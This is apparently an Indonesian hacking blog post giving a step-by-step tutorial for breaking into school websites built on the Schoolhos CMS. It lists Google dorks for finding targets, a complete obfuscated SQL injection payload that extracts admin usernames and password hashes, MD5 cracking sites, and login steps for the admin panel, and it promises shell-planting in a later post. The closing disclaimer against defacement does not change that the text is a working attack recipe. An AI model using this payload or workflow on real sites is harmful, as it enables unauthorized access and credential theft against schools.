DEFACE CMS SCHOOL HOST SQLi

hallo para master , sebelumnya saya minta maaf kalo Post ini penuh kekurangan
CMS school host yang banyak digunakan website sch.id atau website sekolah ini memiliki bug yang cukup beresiko, simak tutorial berikut

Bahan

1. Dork

#  inurl:"/?p=info" site:id

#  inurl:"/?p=detberita"

#  inurl:"/?p=guru" site:id 

# inurl:/?p=bukutamu 

# intext:Schoolhos Free Open Source CMS

Kembangkan , jangan manja , gunakan otak kalian !

2. Sql Exploit

' and %40x%3A%3Dconcat%2F**_**%2F((select(@x)from(select(@x:=0x00),(select(0)from(sh_users)where(0x00)in(@x:=concat+(@x,0x3c62723e,s_username,0x203a3a20,sandiusers))))x)) /*!50000union*/ /*!50000select*/ 1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+

3. MD5 hash

www.md5online.org/

https://hashkiller.co.uk/

md5cracker.org/

www.md5hashgenerator.com/ 

Langkah Tutorial

1. Dorking di GOOGLE

cari terus , jangan malas

2. pilih target

3. masukan exploit

ex: www.target.domain/?p=detberita&id=5' and %40x%3A%3Dconcat%2F**_**%2F((select(@x)from(select(@x:=0x00),(select(0)from(sh_users)where(0x00)in(@x:=concat+(@x,0x3c62723e,s_username,0x203a3a20,sandiusers))))x)) /*!50000union*/ /*!50000select*/ 1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+

4.kalo vuln maka akan seperti ini




disamping user ada angka angka Contoh admin30017008 hiraukan saja

5. Copy MD5 hash tadi , buka MD5 decrypter, masukan di situ , submit

6. login ke page admin nya : http://terget.domain/adminpanel

masukan user dan password 

selesai ..

mau tanam shell  ? tunggu post berikutnya

Catatan : Perlu di ingat cms ini digunakan banyak sekolah , saya mohon jangan mendeface situs situs sekolah , apalagi sampai tembas index, terus dimasukin archive

pengen tenar ? pengen di puji ? lo cari ilmu apa cari  muka ! kalo pengen tenar buat tool jangan merusak

gsk usah show off defacean , admin tidak bertanggung jawab jika ada masalah , ini hanya sekedar penmbelajaran untuk para newbie